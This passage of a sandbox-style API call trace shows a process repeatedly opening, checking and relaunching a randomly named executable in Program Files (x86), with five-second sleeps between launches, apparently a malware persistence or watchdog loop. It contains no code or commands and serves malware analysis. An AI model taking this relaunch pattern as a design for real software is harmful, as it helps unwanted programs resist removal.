NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.503] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0xbb4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.503] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.503] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64380) returned 1 [0202.503] NtClose (Handle=0xbb4) returned 0x0 [0202.506] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1950, hThread=0xbb4, dwProcessId=0xe58, dwThreadId=0x107c), hNewToken=0x0) returned 1 [0202.527] Sleep (dwMilliseconds=0x1388) [0202.528] Sleep (dwMilliseconds=0x1388) [0202.529] Sleep (dwMilliseconds=0x1388) [0202.531] Sleep (dwMilliseconds=0x1388) [0202.533] Sleep (dwMilliseconds=0x1388) [0202.535] Sleep (dwMilliseconds=0x1388) [0202.536] Sleep (dwMilliseconds=0x1388) [0202.538] Sleep (dwMilliseconds=0x1388) [0202.540] Sleep (dwMilliseconds=0x1388) [0202.541] Sleep (dwMilliseconds=0x1388) [0202.542] Sleep (dwMilliseconds=0x1388) [0202.592] Sleep (dwMilliseconds=0x1388) [0202.594] Sleep (dwMilliseconds=0x1388) [0202.595] Sleep (dwMilliseconds=0x1388) [0202.597] Sleep (dwMilliseconds=0x1388) [0202.601] Sleep (dwMilliseconds=0x1388) [0202.603] Sleep (dwMilliseconds=0x1388) [0202.604] Sleep (dwMilliseconds=0x1388) [0202.606] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.606] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1504, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.606] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.606] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64c00) returned 1 [0202.606] NtQueryInformationFile (in: FileHandle=0x1504, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0202.606] NtClose (Handle=0x1504) returned 0x0 [0202.607] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.607] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1504, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.607] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.607] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c66080) returned 1 [0202.607] NtClose (Handle=0x1504) returned 0x0 [0202.610] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x12dc, hThread=0x1504, dwProcessId=0x10a4, dwThreadId=0x124c), hNewToken=0x0) returned 1 [0202.627] Sleep (dwMilliseconds=0x1388) [0202.628] Sleep (dwMilliseconds=0x1388) [0202.637] Sleep (dwMilliseconds=0x1388) [0202.638] Sleep (dwMilliseconds=0x1388) [0202.640] Sleep (dwMilliseconds=0x1388) [0202.641] Sleep (dwMilliseconds=0x1388) [0202.643] Sleep (dwMilliseconds=0x1388) [0202.644] Sleep (dwMilliseconds=0x1388) [0202.648] Sleep (dwMilliseconds=0x1388) [0202.650] Sleep (dwMilliseconds=0x1388) [0202.651] Sleep (dwMilliseconds=0x1388) [0202.653] Sleep (dwMilliseconds=0x1388) [0202.654] Sleep (dwMilliseconds=0x1388) [0202.656] Sleep (dwMilliseconds=0x1388) [0202.657] Sleep (dwMilliseconds=0x1388) [0202.659] Sleep (dwMilliseconds=0x1388) [0202.660] Sleep (dwMilliseconds=0x1388) [0202.665] Sleep (dwMilliseconds=0x1388) [0202.666] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.667] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a3c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.667] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.667] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0202.667] NtQueryInformationFile (in: FileHandle=0x1a3c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0202.667] NtClose (Handle=0x1a3c) returned 0x0 [0202.667] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.667] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a3c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.667] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.667] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64480) returned 1 [0202.667] NtClose (Handle=0x1a3c) returned 0x0 [0202.670] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1a2c, hThread=0x1a3c, dwProcessId=0x106c, dwThreadId=0x12a8), hNewToken=0x0) returned 1 [0202.686] Sleep (dwMilliseconds=0x1388) [0202.689] Sleep (dwMilliseconds=0x1388) [0202.690] Sleep (dwMilliseconds=0x1388) [0202.692] Sleep (dwMilliseconds=0x1388) [0202.693] Sleep (dwMilliseconds=0x1388) [0202.694] Sleep (dwMilliseconds=0x1388) [0202.696] Sleep (dwMilliseconds=0x1388) [0202.700] Sleep (dwMilliseconds=0x1388) [0202.701] Sleep (dwMilliseconds=0x1388) [0202.702] Sleep (dwMilliseconds=0x1388) [0202.704] Sleep (dwMilliseconds=0x1388) [0202.705] Sleep (dwMilliseconds=0x1388) [0202.707] Sleep (dwMilliseconds=0x1388) [0202.708] Sleep (dwMilliseconds=0x1388) [0202.710] Sleep (dwMilliseconds=0x1388) [0202.711] Sleep (dwMilliseconds=0x1388) [0202.715] Sleep (dwMilliseconds=0x1388) [0202.717] Sleep (dwMilliseconds=0x1388) [0202.718] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.718] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a14, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.719] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.719] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65080) returned 1 [0202.719] NtQueryInformationFile (in: FileHandle=0x1a14, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0202.719] NtClose (Handle=0x1a14) returned 0x0 [0202.719] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.719] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a14, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.719] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.719] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0202.719] NtClose (Handle=0x1a14) returned 0x0 [0202.722] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0xbac, hThread=0x1a14, dwProcessId=0x1094, dwThreadId=0x13b0), hNewToken=0x0) returned 1 [0202.737] Sleep (dwMilliseconds=0x1388) [0202.738] Sleep (dwMilliseconds=0x1388) [0202.739] Sleep (dwMilliseconds=0x1388) [0202.741] Sleep (dwMilliseconds=0x1388) [0202.742] Sleep (dwMilliseconds=0x1388) [0202.746] Sleep (dwMilliseconds=0x1388) [0202.747] Sleep (dwMilliseconds=0x1388) [0202.751] Sleep (dwMilliseconds=0x1388) [0202.753] Sleep (dwMilliseconds=0x1388) [0202.754] Sleep (dwMilliseconds=0x1388) [0202.756] Sleep (dwMilliseconds=0x1388) [0202.757] Sleep (dwMilliseconds=0x1388) [0202.759] Sleep (dwMilliseconds=0x1388) [0202.760] Sleep (dwMilliseconds=0x1388) [0202.762] Sleep (dwMilliseconds=0x1388) [0202.763] Sleep (dwMilliseconds=0x1388) [0202.767] Sleep (dwMilliseconds=0x1388) [0202.769] Sleep (dwMilliseconds=0x1388) [0202.771] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.771] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0xa20, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.771] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.771] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65200) returned 1 [0202.771] NtQueryInformationFile (in: FileHandle=0xa20, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0202.771] NtClose (Handle=0xa20) returned 0x0 [0202.771] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.771] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0xa20, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.771] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.771] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0202.771] NtClose (Handle=0xa20) returned 0x0 [0202.774] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x199c, hThread=0xa20, dwProcessId=0x109c, dwThreadId=0x12e0), hNewToken=0x0) returned 1 [0202.791] Sleep (dwMilliseconds=0x1388) [0202.792] Sleep (dwMilliseconds=0x1388) [0202.794] Sleep (dwMilliseconds=0x1388) [0202.795] Sleep (dwMilliseconds=0x1388) [0202.800] Sleep (dwMilliseconds=0x1388) [0202.809] Sleep (dwMilliseconds=0x1388) [0202.811] Sleep (dwMilliseconds=0x1388) [0202.815] Sleep (dwMilliseconds=0x1388) [0202.817] Sleep (dwMilliseconds=0x1388) [0202.818] Sleep (dwMilliseconds=0x1388) [0202.820] Sleep (dwMilliseconds=0x1388) [0202.821] Sleep (dwMilliseconds=0x1388) [0202.823] Sleep (dwMilliseconds=0x1388) [0202.824] Sleep (dwMilliseconds=0x1388) [0202.826] Sleep (dwMilliseconds=0x1388) [0202.831] Sleep (dwMilliseconds=0x1388) [0202.832] Sleep (dwMilliseconds=0x1388) [0202.834] Sleep (dwMilliseconds=0x1388) [0202.835] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.835] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1edc, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.835] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.835] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64180) returned 1 [0202.836] NtQueryInformationFile (in: FileHandle=0x1edc, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0202.836] NtClose (Handle=0x1edc) returned 0x0 [0202.836] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.836] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1edc, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.836] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.837] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0202.837] NtClose (Handle=0x1edc) returned 0x0 [0202.839] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1d5c, hThread=0x1edc, dwProcessId=0x870, dwThreadId=0x10d4), hNewToken=0x0) returned 1 [0202.873] Sleep (dwMilliseconds=0x1388) [0202.874] Sleep (dwMilliseconds=0x1388) [0202.876] Sleep (dwMilliseconds=0x1388) [0202.878] Sleep (dwMilliseconds=0x1388) [0202.879] Sleep (dwMilliseconds=0x1388) [0202.881] Sleep (dwMilliseconds=0x1388) [0202.883] Sleep (dwMilliseconds=0x1388) [0202.884] Sleep (dwMilliseconds=0x1388) [0202.885] Sleep (dwMilliseconds=0x1388) [0202.887] Sleep (dwMilliseconds=0x1388) [0202.888] Sleep (dwMilliseconds=0x1388) [0202.890] Sleep (dwMilliseconds=0x1388) [0202.891] Sleep (dwMilliseconds=0x1388) [0202.896] Sleep (dwMilliseconds=0x1388) [0202.898] Sleep (dwMilliseconds=0x1388) [0202.900] Sleep (dwMilliseconds=0x1388) [0202.901] Sleep (dwMilliseconds=0x1388) [0202.903] Sleep (dwMilliseconds=0x1388) [0202.904] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.905] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1d3c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.905] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.905] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65600) returned 1 [0202.905] NtQueryInformationFile (in: FileHandle=0x1d3c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0202.905] NtClose (Handle=0x1d3c) returned 0x0 [0202.905] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.905] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1d3c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.905] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: 